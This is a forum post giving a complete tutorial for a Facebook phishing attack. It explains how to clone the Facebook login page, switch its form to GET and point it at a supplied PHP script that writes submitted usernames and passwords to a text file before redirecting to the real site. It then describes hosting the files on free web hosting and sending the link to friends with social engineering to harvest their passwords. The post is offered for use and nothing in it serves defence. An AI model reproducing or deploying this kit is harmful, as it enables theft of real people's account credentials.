OP 02 April, 2020 - 03:09 AM
Just Go here https://www.facebook.com/login.php and right click on anywhere in the webpage and select View Page Source.
Copy all the codes in the page and paste it on note pad or Note pad ++(recommended) and save it like "Index.Html".
Copy the below Php code and paste it on another note pad. and name it "Fb.php".
<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
And Create a empty new note pad and save it "pass.txt".
Now you having the Three files
Index.html
Fb.php
Pass.txt
Now we are at the working part, Right click on the Index.html file and open it using note pad or note pad ++. Now press The CTRL + F to perform the search operation. Search the Keyword called action=' also you see "method=post" change it into "method=get".
The keyword followed by the URL look like this.
action="www.facebook.com/login.php"
Now you need to change the URL of existing one. Just replace the existing URL with "fb.php" Which we created earlier.This will look like this after the changes.
action="fb.php"
Thats it you are done half of the part. Now you need any free web hosting accounts to upload these files I refer my3gp.com,110mb or any free hosting account which you trusted and also not banned for a long time. if you prefer the paid hosting means that is more than good.
Sign up into my3gb.com and Select the file manger and upload these three files to same directory else this won't work.
Copy the Html file link(Index.html) which uploaded and send it to you friends and tell to sign in and see the magic ( Actually you need to show some social engineering there).
then check the empty text file to get the password.
That's it you are done!